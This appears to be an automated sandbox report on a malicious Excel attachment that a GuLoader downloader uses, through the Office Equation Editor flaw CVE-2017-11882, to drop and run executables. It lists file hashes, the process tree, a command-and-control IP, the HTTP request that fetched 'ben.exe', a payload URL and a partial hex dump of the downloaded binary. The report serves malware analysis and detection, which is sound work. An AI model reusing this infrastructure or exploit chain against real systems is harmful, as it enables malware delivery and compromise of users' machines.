Play interactive tour

Edit tour

Windows Analysis Report new order no. Hc511 for sept.xlsx

Overview

General Information

Sample Name:	new order no. Hc511 for sept.xlsx
Analysis ID:	482516
MD5:	10522a9c4f1f52b4fe31456e03133b43
SHA1:	f78da793ab620c213e55e33ecdfe689f780eb910
SHA256:	342d93a58f17297d9de1ab5dbe0f23298f1cb7e2622d5816208ce5ef11579984
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3028 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1232 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2140 cmdline: 'C:\Users\Public\vbc.exe' MD5: 652E9A32D7FDC6783BC63C097D8ACF74)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&i"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.245.26.190, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1232, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1232, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1232, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2140

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&i"}

Multi AV Scanner detection for submitted file

Show sources

Source: new order no. Hc511 for sept.xlsx	Virustotal: Detection: 30%			Perma Link
Source: new order no. Hc511 for sept.xlsx	ReversingLabs: Detection: 23%

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 15%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&i

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

IP Address: 172.245.26.190 172.245.26.190

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:58:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 12:47:12 GMTETag: "20000-5cbdfdd2ef7af"Accept-Ranges: bytesContent-Length: 131072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f ad a0 db 0b cc ce 88 0b cc ce 88 0b cc ce 88 88 d0 c0 88 0a cc ce 88 44 ee c7 88 08 cc ce 88 3d ea c3 88 0a cc ce 88 52 69 63 68 0b cc ce 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 b3 c4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 50 00 00 00 00 00 00 74 15 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 04 00 04 00 00 00 00 00 00 00 00 10 02 00 00 10 00 00 e2 83 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 b7 01 00 28 00 00 00 00 e0 01 00 8b 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 19 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8b 29 00 00 00 e0 01 00 00 30 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /gen/ben.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.26.190Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.26.190

Source: vbc.exe.4.dr	String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 74DB69FF.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74DB69FF.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401574	6_2_00401574
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C7129	6_2_003C7129
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C3819	6_2_003C3819
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C9C0D	6_2_003C9C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5C7D	6_2_003C5C7D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C646F	6_2_003C646F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C1846	6_2_003C1846
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C30B1	6_2_003C30B1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C4CA5	6_2_003C4CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C608F	6_2_003C608F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C58FD	6_2_003C58FD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C28FA	6_2_003C28FA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C18DD	6_2_003C18DD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C38CD	6_2_003C38CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C28C3	6_2_003C28C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5D27	6_2_003C5D27
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003CBD15	6_2_003CBD15
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C6505	6_2_003C6505
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C297D	6_2_003C297D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C6165	6_2_003C6165
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C4167	6_2_003C4167
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5D61	6_2_003C5D61
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C55BD	6_2_003C55BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C1995	6_2_003C1995
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C7191	6_2_003C7191
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C95E4	6_2_003C95E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C61E5	6_2_003C61E5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C35E0	6_2_003C35E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C4DD8	6_2_003C4DD8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5DD3	6_2_003C5DD3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5637	6_2_003C5637
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C6E33	6_2_003C6E33
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5A27	6_2_003C5A27
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C1A21	6_2_003C1A21
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C2612	6_2_003C2612
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5E4D	6_2_003C5E4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C3647	6_2_003C3647
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C1AA9	6_2_003C1AA9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5EA7	6_2_003C5EA7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C36DA	6_2_003C36DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5ACD	6_2_003C5ACD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C62C1	6_2_003C62C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C1B36	6_2_003C1B36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C632B	6_2_003C632B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5B73	6_2_003C5B73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5762	6_2_003C5762
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5F57	6_2_003C5F57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C37A2	6_2_003C37A2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C339B	6_2_003C339B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C378B	6_2_003C378B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5BFB	6_2_003C5BFB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C17F5	6_2_003C17F5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C5FEE	6_2_003C5FEE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C57E1	6_2_003C57E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C9BDF	6_2_003C9BDF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C63C5	6_2_003C63C5

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C7129 NtAllocateVirtualMemory,	6_2_003C7129
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C7191 NtAllocateVirtualMemory,	6_2_003C7191
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C71FD NtAllocateVirtualMemory,	6_2_003C71FD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C728D NtAllocateVirtualMemory,	6_2_003C728D

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: ben[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: new order no. Hc511 for sept.xlsx	Virustotal: Detection: 30%
Source: new order no. Hc511 for sept.xlsx	ReversingLabs: Detection: 23%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$new order no. Hc511 for sept.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR1F14.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winXLSX@4/21@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00417B40 push dword ptr [edi+000000BCh]; ret	6_2_0041854C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405015 push esi; iretd	6_2_00405016
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00406435 push esi; retf	6_2_00406436
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004066C5 pushfd ; iretd	6_2_004066C7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004038CD push esi; ret	6_2_004038D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040394E push ds; iretd	6_2_0040397F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404F35 push esi; iretd	6_2_00404F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004043D0 pushfd ; retf	6_2_004043D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C3DBA push 38926977h; ret	6_2_003C3DC1

Source: initial sample	Static PE information: section name: .text entropy: 7.1086042671
Source: initial sample	Static PE information: section name: .text entropy: 7.1086042671

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1444

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003C9F3C rdtsc

6_2_003C9F3C

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003C9F3C rdtsc

6_2_003C9F3C

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C6C03 mov eax, dword ptr fs:[00000030h]	6_2_003C6C03
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C4167 mov eax, dword ptr fs:[00000030h]	6_2_003C4167
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003C9282 mov eax, dword ptr fs:[00000030h]	6_2_003C9282

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Mitre Att&ck Matrix

